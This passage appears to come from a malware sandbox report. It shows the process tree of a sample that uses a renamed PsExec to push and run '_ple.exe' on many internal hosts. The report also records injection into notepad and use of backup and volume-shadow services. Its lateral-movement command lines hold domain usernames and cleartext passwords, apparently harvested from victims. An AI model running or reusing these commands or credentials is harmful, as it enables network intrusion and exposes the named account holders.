                                                C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                3⤵
                                                • Drops file in Windows directory
                                                • Modifies data under HKEY_USERS
                                                PID:1168
                                              • C:\Windows\TEMP\_fif.exe
                                                C:\Windows\TEMP\_fif.exe \\EWYCRADZ -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                3⤵
                                                • Drops file in Windows directory
                                                • Modifies data under HKEY_USERS
                                                PID:3408
                                              • C:\Windows\TEMP\_fif.exe
                                                C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                3⤵
                                                  PID:4708
                                                • C:\Windows\TEMP\_fif.exe
                                                  C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                  3⤵
                                                  • Modifies data under HKEY_USERS
                                                  PID:4720
                                                • C:\Windows\TEMP\_fif.exe
                                                  C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                  3⤵
                                                  • Modifies data under HKEY_USERS
                                                  PID:4748
                                                • C:\Windows\TEMP\_fif.exe
                                                  C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                  3⤵
                                                    PID:200
                                                  • C:\Windows\TEMP\_fif.exe
                                                    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                    3⤵
                                                      PID:4744
                                                    • C:\Windows\TEMP\_fif.exe
                                                      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                      3⤵
                                                        PID:4984
                                                      • C:\Windows\TEMP\_fif.exe
                                                        C:\Windows\TEMP\_fif.exe \\Ewycradz -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                        3⤵
                                                          PID:4824
                                                        • C:\Windows\TEMP\_fif.exe
                                                          C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                          3⤵
                                                          • Modifies data under HKEY_USERS
                                                          PID:4808
                                                        • C:\Windows\TEMP\_fif.exe
                                                          C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                          3⤵
                                                            PID:5084
                                                          • C:\Windows\TEMP\_fif.exe
                                                            C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                            3⤵
                                                            • Modifies data under HKEY_USERS
                                                            PID:4900
                                                          • C:\Windows\TEMP\_fif.exe
                                                            C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                            3⤵
                                                              PID:1464
                                                            • C:\Windows\TEMP\_fif.exe
                                                              C:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                              3⤵
                                                              • Modifies data under HKEY_USERS
                                                              PID:4108
                                                            • C:\Windows\TEMP\_fif.exe
                                                              C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                              3⤵
                                                                PID:4172
                                                              • C:\Windows\TEMP\_fif.exe
                                                                C:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                3⤵
                                                                  PID:2704
                                                                • C:\Windows\TEMP\_fif.exe
                                                                  C:\Windows\TEMP\_fif.exe \\Ewycradz -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                  3⤵
                                                                  • Modifies data under HKEY_USERS
                                                                  PID:5112
                                                                • C:\Windows\TEMP\_fif.exe
                                                                  C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                  3⤵
                                                                    PID:3996
                                                                  • C:\Windows\TEMP\_fif.exe
                                                                    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                    3⤵
                                                                      PID:4664
                                                                    • C:\Windows\TEMP\_fif.exe
                                                                      C:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                      3⤵
                                                                        PID:4216
                                                                      • C:\Windows\TEMP\_fif.exe
                                                                        C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                        3⤵
                                                                          PID:4692
                                                                        • C:\Windows\TEMP\_fif.exe
                                                                          C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                          3⤵
                                                                          • Modifies data under HKEY_USERS
                                                                          PID:4780
                                                                        • C:\Windows\TEMP\_fif.exe
                                                                          C:\Windows\TEMP\_fif.exe \\10.10.0.82 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                          3⤵
                                                                            PID:4588
                                                                          • C:\Windows\TEMP\_fif.exe
                                                                            C:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                            3⤵
                                                                              PID:4452
                                                                            • C:\Windows\TEMP\_fif.exe
                                                                              C:\Windows\TEMP\_fif.exe \\Ewycradz -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                              3⤵
                                                                                PID:4648
                                                                              • C:\Windows\TEMP\_fif.exe
                                                                                C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                3⤵
                                                                                  PID:4852
                                                                                • C:\Windows\TEMP\_fif.exe
                                                                                  C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                  3⤵
                                                                                  • Modifies data under HKEY_USERS
                                                                                  PID:212
                                                                                • C:\Windows\TEMP\_fif.exe
                                                                                  C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                  3⤵
                                                                                    PID:1376
                                                                                  • C:\Windows\TEMP\_fif.exe
                                                                                    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                    3⤵
                                                                                    • Drops file in Windows directory
                                                                                    PID:5012
                                                                                  • C:\Windows\TEMP\_fif.exe
                                                                                    C:\Windows\TEMP\_fif.exe \\Ewycradz -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                    3⤵
                                                                                    • Drops file in Windows directory
                                                                                    PID:2676
                                                                                  • C:\Windows\TEMP\_fif.exe
                                                                                    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                    3⤵
                                                                                      PID:3672
                                                                                    • C:\Windows\TEMP\_fif.exe
                                                                                      C:\Windows\TEMP\_fif.exe \\10.10.0.88 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                      3⤵
                                                                                      • Modifies data under HKEY_USERS
                                                                                      PID:4224
                                                                                    • C:\Windows\TEMP\_fif.exe
                                                                                      C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                      3⤵
                                                                                        PID:2164
                                                                                      • C:\Windows\TEMP\_fif.exe
                                                                                        C:\Windows\TEMP\_fif.exe \\Ewycradz -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                        3⤵
                                                                                          PID:4276
                                                                                        • C:\Windows\TEMP\_fif.exe
                                                                                          C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                          3⤵
                                                                                            PID:4296
                                                                                          • C:\Windows\TEMP\_fif.exe
                                                                                            C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                            3⤵
                                                                                            • Modifies data under HKEY_USERS
                                                                                            PID:4116
                                                                                          • C:\Windows\TEMP\_fif.exe
                                                                                            C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                            3⤵
                                                                                              PID:4608
                                                                                            • C:\Windows\TEMP\_fif.exe
                                                                                              C:\Windows\TEMP\_fif.exe \\Ewycradz -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                              3⤵
                                                                                                PID:4628
                                                                                              • C:\Windows\TEMP\_fif.exe
                                                                                                C:\Windows\TEMP\_fif.exe \\10.10.0.93 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                3⤵
                                                                                                  PID:4796
                                                                                                • C:\Windows\TEMP\_fif.exe
                                                                                                  C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                  3⤵
                                                                                                    PID:4432
                                                                                                  • C:\Windows\TEMP\_fif.exe
                                                                                                    C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                    3⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:4672
                                                                                                  • C:\Windows\TEMP\_fif.exe
                                                                                                    C:\Windows\TEMP\_fif.exe \\10.10.0.67 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                    3⤵
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    PID:4940
                                                                                                  • C:\Windows\TEMP\_fif.exe
                                                                                                    C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                    3⤵
                                                                                                      PID:1796
                                                                                                    • C:\Windows\TEMP\_fif.exe
                                                                                                      C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                      3⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:4696
                                                                                                    • C:\Windows\TEMP\_fif.exe
                                                                                                      C:\Windows\TEMP\_fif.exe \\10.10.0.71 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                      3⤵
                                                                                                        PID:4732
                                                                                                      • C:\Windows\TEMP\_fif.exe
                                                                                                        C:\Windows\TEMP\_fif.exe \\10.10.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                        3⤵
                                                                                                          PID:4148
                                                                                                        • C:\Windows\TEMP\_fif.exe
                                                                                                          C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                          3⤵
                                                                                                            PID:4960
                                                                                                          • C:\Windows\TEMP\_fif.exe
                                                                                                            C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                            3⤵
                                                                                                              PID:2316
                                                                                                            • C:\Windows\TEMP\_fif.exe
                                                                                                              C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                              3⤵
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:5088
                                                                                                            • C:\Windows\TEMP\_fif.exe
                                                                                                              C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                              3⤵
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              PID:1580
                                                                                                            • C:\Windows\TEMP\_fif.exe
                                                                                                              C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                              3⤵
                                                                                                                PID:4228
                                                                                                              • C:\Windows\TEMP\_fif.exe
                                                                                                                C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                3⤵
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:4600
                                                                                                              • C:\Windows\TEMP\_fif.exe
                                                                                                                C:\Windows\TEMP\_fif.exe \\10.10.0.68 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                3⤵
                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                PID:4156
                                                                                                              • C:\Windows\TEMP\_fif.exe
                                                                                                                C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                3⤵
                                                                                                                  PID:4668
                                                                                                                • C:\Windows\TEMP\_fif.exe
                                                                                                                  C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "MicrosoftOffice16_Data:SSPI:[email protected]\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                  3⤵
                                                                                                                    PID:4516
                                                                                                                  • C:\Windows\TEMP\_fif.exe
                                                                                                                    C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                    3⤵
                                                                                                                      PID:4348
                                                                                                                    • C:\Windows\TEMP\_fif.exe
                                                                                                                      C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                      3⤵
                                                                                                                        PID:3932
                                                                                                                      • C:\Windows\TEMP\_fif.exe
                                                                                                                        C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                        3⤵
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:4444
                                                                                                                      • C:\Windows\TEMP\_fif.exe
                                                                                                                        C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                        3⤵
                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                        PID:1192
                                                                                                                      • C:\Windows\TEMP\_fif.exe
                                                                                                                        C:\Windows\TEMP\_fif.exe \\10.10.0.67 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                        3⤵
                                                                                                                          PID:4876
                                                                                                                        • C:\Windows\TEMP\_fif.exe
                                                                                                                          C:\Windows\TEMP\_fif.exe \\10.10.0.71 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                          3⤵
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          PID:4992
                                                                                                                        • C:\Windows\TEMP\_fif.exe
                                                                                                                          C:\Windows\TEMP\_fif.exe \\10.10.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                          3⤵
                                                                                                                            PID:4860
                                                                                                                          • C:\Windows\TEMP\_fif.exe
                                                                                                                            C:\Windows\TEMP\_fif.exe \\10.10.0.95 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                            3⤵
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:904
                                                                                                                          • C:\Windows\TEMP\_fif.exe
                                                                                                                            C:\Windows\TEMP\_fif.exe \\10.10.0.68 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                            3⤵
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:4016
                                                                                                                          • C:\Windows\TEMP\_fif.exe
                                                                                                                            C:\Windows\TEMP\_fif.exe \\10.10.0.95 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
                                                                                                                            3⤵
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:5100
                                                                                                                      • C:\Windows\system32\vssvc.exe
                                                                                                                        C:\Windows\system32\vssvc.exe
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:612
                                                                                                                      • C:\Windows\PSEXESVC.exe
                                                                                                                        C:\Windows\PSEXESVC.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                        PID:1856
                                                                                                                        • C:\Windows\_ple.exe
                                                                                                                          "_ple.exe"
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                          PID:1892
                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                            "C:\Windows\system32\notepad.exe"
                                                                                                                            3⤵
                                                                                                                            • Drops file in Windows directory
                                                                                                                            PID:2872
                                                                                                                        • C:\Windows\_ple.exe
                                                                                                                          "_ple.exe"
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:188
                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                            "C:\Windows\system32\notepad.exe"
                                                                                                                            3⤵
                                                                                                                            • Drops file in Windows directory
                                                                                                                            PID:2080
                                                                                                                        • C:\Windows\_ple.exe
                                                                                                                          "_ple.exe"
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4344
                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                            "C:\Windows\system32\notepad.exe"
                                                                                                                            3⤵
                                                                                                                            • Drops file in Windows directory
                                                                                                                            PID:4364
                                                                                                                        • C:\Windows\_ple.exe
                                                                                                                          "_ple.exe"
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4840
                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                            "C:\Windows\system32\notepad.exe"
                                                                                                                            3⤵
                                                                                                                            • Drops file in Windows directory
                                                                                                                            PID:4864
                                                                                                                        • C:\Windows\_ple.exe
                                                                                                                          "_ple.exe"
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5116
                                                                                                                          • C:\Windows\SysWOW64\notepad.exe
                                                                                                                            "C:\Windows\system32\notepad.exe"
                                                                                                                            3⤵
                                                                                                                            • Drops file in Windows directory
                                                                                                                            PID:3924
                                                                                                                      • C:\Windows\system32\wbengine.exe
                                                                                                                        "C:\Windows\system32\wbengine.exe"
                                                                                                                        1⤵
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:264
                                                                                                                      • C:\Windows\System32\vdsldr.exe
                                                                                                                        C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:3996
                                                                                                                        • C:\Windows\System32\vds.exe
                                                                                                                          C:\Windows\System32\vds.exe
                                                                                                                          1⤵
                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                          PID:2520

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • memory/2872-34-0x0000000002FF0000-0x0000000002FF2000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8KB